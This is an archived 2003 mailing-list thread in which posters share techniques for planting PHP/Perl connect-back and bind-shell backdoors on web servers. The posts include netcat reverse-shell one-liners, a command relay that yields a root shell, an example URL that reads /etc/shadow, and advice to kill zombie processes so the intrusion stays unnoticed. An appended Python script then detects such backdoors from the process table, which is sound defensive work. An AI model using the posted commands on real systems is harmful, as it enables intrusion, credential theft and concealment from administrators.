Vulnerability Development mailing list archives

Re: perl/php connect-back backdoor?


From: Diode Trnasistor <ffddfe () yahoo com>
Date: Wed, 30 Jul 2003 03:28:41 -0700 (PDT)

Hi,

I've been using this technique for a while.  If you
can upload a php or a perl file which gets executed in
the server context you have already won, regardless of
firewall rules.  The obvious method is the connect
back (i.e. nc -e /bin/sh x.x.x.x 80 as that's the
likely allowed outbound port).  If that's a no go,
and there's absolutely no way to establish a
session, you still win.

Consider this:
<?
   `exploit which gets root and calls nc -e /bin/sh -l
-p 9999`
?>

then another script:
<?
   $z = `echo $x | nc localhost 9999`;
   $z = str_replace("\n", "<br>", $z);
   echo $z;
?>

As is obvious, call the second script and you have
somewhat of a crippled root shell.

www.target.com/script2.php?x=cat /etc/shadow

you get the point :P

PS: the silly thing about this is that each command
you execute this way ends up as a zombie process.
In a few minutes of working with this "shell" you'll
have hundreds of zombie processes on the target
machine.  What I like to do is run zkill (zkill.c,
google it) slightly modified to terminate all zombies.
This way it's less obvious that something very odd is
going on.

--- Knud_Erik_Højgaard <kain () ircop dk> wrote:
Ingram wrote:
[snip]
I got right now is uid www. I think a
connect-back perl/php code
could make it through this packet filter, as the
outbound rules could
be less tight.

Anyone aware of a backdoor like this?
netcat:
<? passthru("nc -e /bin/sh ip port"); ?>

or a cronjob doing the same.. 

--
kokanin
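The process-level traces this kind of backdoor leaves on the host are the part a defender can actually look for: a shell or netcat hanging off a web-server worker, and the pile of unreaped zombie children the PS above describes. The following host-side check is an added example, not code from the thread or from any of the posters; the web-server and shell process-name lists, the zombie threshold, and the constructed sample snapshot are all assumptions to be tuned for a real host.

```python
"""Host-side detection of the traces left by a web-spawned shell/netcat backdoor.

Two heuristics, run over a snapshot of the process table:
  1. a shell- or netcat-like process that has a web-server process among its
     ancestors (a web worker normally never spawns these);
  2. a parent holding an unusual number of zombie children (each command run
     through the "echo | nc" wrapper in the post leaves one behind).
"""
import os
from collections import Counter

# Assumed name lists; adjust to the web stack and shells present on the host.
WEB_SERVER_COMMS = {"httpd", "apache", "apache2", "nginx", "php-fpm", "lighttpd"}
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "netcat", "perl"}
ZOMBIE_THRESHOLD = 20  # assumed; a healthy worker should hold close to zero


def read_procs():
    """Snapshot every process from /proc (Linux only) as a list of dicts."""
    import pwd
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/status") as fh:
                fields = {}
                for line in fh:
                    key, sep, val = line.partition(":")
                    if sep:
                        fields[key] = val.strip()
            uid = int(fields["Uid"].split()[0])
            try:
                user = pwd.getpwuid(uid).pw_name
            except KeyError:
                user = str(uid)
            procs.append({
                "pid": int(entry),
                "ppid": int(fields["PPid"]),
                "user": user,
                "comm": fields["Name"],
                "state": fields["State"][0],  # 'Z' marks a zombie
            })
        except (OSError, KeyError, ValueError, IndexError):
            continue  # the process exited while we were reading it
    return procs


def web_ancestor(proc, by_pid):
    """Return the nearest ancestor that is a web-server process, or None."""
    seen = set()
    cur = by_pid.get(proc["ppid"])
    while cur and cur["pid"] not in seen:
        if cur["comm"] in WEB_SERVER_COMMS:
            return cur
        seen.add(cur["pid"])  # guard against a malformed snapshot with a cycle
        cur = by_pid.get(cur["ppid"])
    return None


def find_suspicious(procs, zombie_threshold=ZOMBIE_THRESHOLD):
    """Return sorted alert tuples:
    ("shell_under_web", pid, comm, web_pid) for a live shell/netcat descended
    from a web server, and ("zombie_pileup", ppid, count) for a parent holding
    at least zombie_threshold zombie children."""
    by_pid = {p["pid"]: p for p in procs}
    alerts = []
    zombies = Counter()
    for p in procs:
        if p["state"] == "Z":
            zombies[p["ppid"]] += 1  # zombies are handled by rule 2 only
            continue
        if p["comm"] in SHELL_LIKE:
            web = web_ancestor(p, by_pid)
            if web:
                alerts.append(("shell_under_web", p["pid"], p["comm"], web["pid"]))
    for ppid, n in zombies.items():
        if n >= zombie_threshold:
            alerts.append(("zombie_pileup", ppid, n))
    return sorted(alerts)


# Constructed sample snapshot (not real data): an httpd worker running as www
# has spawned sh -> nc, and 25 of its children exited without being reaped.
# The sh under cron is there to show a benign shell is not flagged.
SAMPLE = [
    {"pid": 1, "ppid": 0, "user": "root", "comm": "init", "state": "S"},
    {"pid": 900, "ppid": 1, "user": "root", "comm": "cron", "state": "S"},
    {"pid": 901, "ppid": 900, "user": "root", "comm": "sh", "state": "S"},
    {"pid": 1200, "ppid": 1, "user": "www", "comm": "httpd", "state": "S"},
    {"pid": 1300, "ppid": 1200, "user": "www", "comm": "sh", "state": "S"},
    {"pid": 1301, "ppid": 1300, "user": "www", "comm": "nc", "state": "S"},
] + [
    {"pid": 2000 + i, "ppid": 1200, "user": "www", "comm": "sh", "state": "Z"}
    for i in range(25)
]

if __name__ == "__main__":
    import sys
    # Pass --live on a Linux host to scan the real process table instead.
    procs = read_procs() if "--live" in sys.argv else SAMPLE
    for alert in find_suspicious(procs):
        print(alert)
```

Run as-is the script reports the two shells under the httpd worker and the zombie pile-up under pid 1200; the benign cron-spawned sh is not reported because nothing in its ancestry is a web server. Walking the full ancestry rather than only the direct parent matters because the post's wrapper goes through sh before nc, and the same logic also catches the connect-back form quoted below (passthru spawning nc) since that nc is likewise a descendant of the web worker.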

